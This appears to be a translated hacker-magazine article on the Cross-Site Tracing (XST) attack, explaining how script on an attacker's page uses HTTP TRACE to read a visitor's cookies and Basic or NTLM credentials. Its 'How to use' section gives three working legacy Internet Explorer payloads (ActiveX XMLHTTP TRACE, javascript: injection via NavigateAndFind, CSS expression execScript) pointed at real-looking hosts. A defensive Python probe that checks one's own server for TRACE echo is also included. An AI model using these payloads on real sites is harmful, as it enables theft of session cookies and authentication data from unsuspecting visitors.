Research on the Cross-Site Tracing (XST) Attack

Source: Internet
Author: User
Tags: HTTP authentication
Note: This article was published in issue 8 of Hacker Line of Defense, which holds the copyright.

XST Attack Description:
An attacker embeds malicious code in a web page on a host the attacker already controls. When a visitor browses that page, the code executes in the visitor's browser and sends a TRACE request to the target host. Because a server that honors TRACE echoes the request it received, headers included, in the response body, the script can read the visitor's cookie, HTTP Basic authentication and NTLM authentication information and send them to the attacker-controlled host. This leads to cookie spoofing or man-in-the-middle attacks.

XST Attack conditions:
1. The target web server must allow the TRACE method;
2. There must be a place to insert the XST code;
3. The target site has a cross-domain vulnerability.
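
Condition 1 is the one a server owner can test and remove. The following is an added example, not code from the original article: it sends a TRACE request carrying canary credentials and reports which of them come back in the response body. The names `reflected_headers`, `probe_trace`, `CANARY` and the host `app.example` are assumptions made for illustration.

```python
import http.client

# Constructed canary credentials used as probe values.
CANARY = {"Cookie": "xst_canary=1", "Authorization": "Basic eHN0OmNhbmFyeQ=="}

def reflected_headers(status, body, sent):
    """Names of sent headers whose exact values are echoed in a TRACE response body."""
    if status != 200:
        return []  # e.g. 405 or 501: TRACE refused, nothing is echoed
    echoed = {}
    for line in body.decode("latin-1").splitlines()[1:]:  # [0] is the echoed request line
        name, sep, value = line.partition(":")
        if sep:
            echoed[name.strip().lower()] = value.strip()
    return sorted(n for n, v in sent.items() if echoed.get(n.lower()) == v)

def probe_trace(host, port=80, path="/", timeout=5):
    """Send one TRACE carrying CANARY to a server you administer; return (status, echoed names)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("TRACE", path, headers=CANARY)
        resp = conn.getresponse()
        return resp.status, reflected_headers(resp.status, resp.read(), CANARY)
    finally:
        conn.close()

# Constructed sample responses (not captured from any real host).
ECHOING = (b"TRACE / HTTP/1.1\r\nHost: app.example\r\nCookie: xst_canary=1\r\n"
           b"Authorization: Basic eHN0OmNhbmFyeQ==\r\n\r\n")
STRIPPED = b"TRACE / HTTP/1.1\r\nHost: app.example\r\n\r\n"

if __name__ == "__main__":
    print(reflected_headers(200, ECHOING, CANARY))   # TRACE enabled, credentials echoed
    print(reflected_headers(200, STRIPPED, CANARY))  # TRACE answered, credentials filtered
    print(reflected_headers(405, b"", CANARY))       # TRACE disabled
```

A non-empty list means condition 1 holds for that server. On Apache httpd, `TraceEnable off` disables the method.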

XST vs. XSS comparison:
Similarities: both are highly deceptive and can harm the victim host. Both attacks work across platforms and technologies; ActiveX controls, Flash, Java and so on can also be used to carry out XST and XSS attacks.
Advantages: XST can bypass ordinary HTTP authentication and NTLM authentication.

How to use:

Technique 1:

<script type="text/javascript">
<!--
function xssTrace() {
    // Legacy Internet Explorer ActiveX XMLHTTP object
    var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
    // Synchronous TRACE request; the server echoes the request headers
    xmlHttp.open("TRACE", "http://wmjie.51.net/swords/", false);
    xmlHttp.send();
    var xmlDoc = xmlHttp.responseText;
    alert(xmlDoc);
}
//-->
</script>
<br><input onclick="xssTrace();" type="button" value="XSS trace">

Technique 2:

<script type="text/javascript">
<!--
function xssTrace() {
    var openWin = open("blank.htm", "swords", "width=500,height=400");
    var oTraceSwords = openWin.external;
    openWin.location.href = "http://wmjie.51.net/swords/";
    setTimeout(
        function () {
            // The following must be written on one line
            oTraceSwords.NavigateAndFind('javascript:xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE","http://wmjie.51.net/swords/",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert("Shows the header information for the site wmjie.51.net/swords/ without using document.cookie.\\n" + xmlDoc);', "", "");
        },
        1024
    );
}
//-->
</script>
<br><input onclick="xssTrace();" type="button" value="XSS trace">

Technique 3:

<script type="text/javascript">
function xssTrace() {
    // Script text that is executed in the context of the dialog's page
    var swords = "var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\",\"http://www.tingh.com/\",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(xmlDoc);";
    var target = "http://wmjie.51.net/swords/";
    var spinach = encodeURIComponent(swords + ';top.close()');
    var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + spinach + '")))';
    showModalDialog(target, null, readyCode);
}
</script>
<br><input onclick="xssTrace();" type="button" value="XSS trace">

Postscript: This work is still at the research stage. I hope it is of some use, and I look forward to exchanging experience with you.
